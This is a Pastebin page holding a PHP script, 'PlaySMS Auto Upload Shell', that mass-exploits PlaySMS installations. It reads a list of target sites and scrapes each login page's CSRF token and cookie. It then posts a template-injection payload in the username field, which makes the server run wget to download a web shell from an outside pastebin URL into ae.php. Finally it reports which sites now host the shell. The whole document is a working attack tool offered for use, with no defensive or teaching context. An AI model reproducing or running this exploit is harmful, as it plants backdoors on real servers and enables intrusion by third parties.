ToKeiChun

Playcms Exploiter [exp.php]

Apr 19th, 2020
224
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.87 KB | None | 0 0
  1. <?php
  2. /**
  3. * @WibuHeker | https://github.com/wibuheker | PlaySMS Auto Upload Shell
  4. */
  5. require_once 'Curl.php';
  6.  
  7. enterlist:
  8. $listname = readline("Enter list : ");
  9. if(empty($listname) || !file_exists($listname)) {
  10. echo"[?] list not found".PHP_EOL;
  11. goto enterlist;
  12. }
  13.  
  14. $lists = explode("\n", str_replace("\r", "", file_get_contents($listname)));
  15. foreach ($lists as $site) {
  16. $curl = new Curl();
  17. $curl->URL = $site . "/index.php";
  18. $curl->GET();
  19. if ($curl->Response()->status_code === 302) {
  20. $urlStore = $site . "/" . $curl->Response()->headers->location;
  21. $curl->URL = $urlStore;
  22. $curl->GET();
  23. if (preg_match('/name="X-CSRF-Token"/', $curl->Response()->body)) {
  24. preg_match_all('/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/', $curl->Response()->body, $match, PREG_SET_ORDER, 0);
  25. $csrf = $match[0]['csrf'];
  26. $cookie = $curl->Response()->headers->set_cookie;
  27. $curl->URL = $urlStore;
  28. $curl->SetHeaders(
  29. array(
  30. "Cookie: {$cookie}"
  31. )
  32. );
  33. $curl->Follow();
  34. $curl->POST("X-CSRF-Token={$csrf}&username={{`wget https://pastebin.com/raw/CUc4w3hc -O ae.php`}}&password=");
  35. if ($curl->Response()->status_code === 200) {
  36. $curl->URL = $site . "/ae.php";
  37. $curl->GET();
  38. if (preg_match('/azzatssins/', $curl->Response()->body)) {
  39. echo $site . "/ae.php -> SHELL" . PHP_EOL;
  40. } else {
  41. echo $site . " Failed Upload Shell" . PHP_EOL;
  42. }
  43. } else {
  44. echo $site . " Unknow Error! Cant execute command!" . PHP_EOL;
  45. }
  46. } else {
  47. echo $urlStore . " -> Cannot retrive CSRF TOKEN!" . PHP_EOL;
  48. }
  49. }
  50. }
Add Comment
Please, Sign In to add comment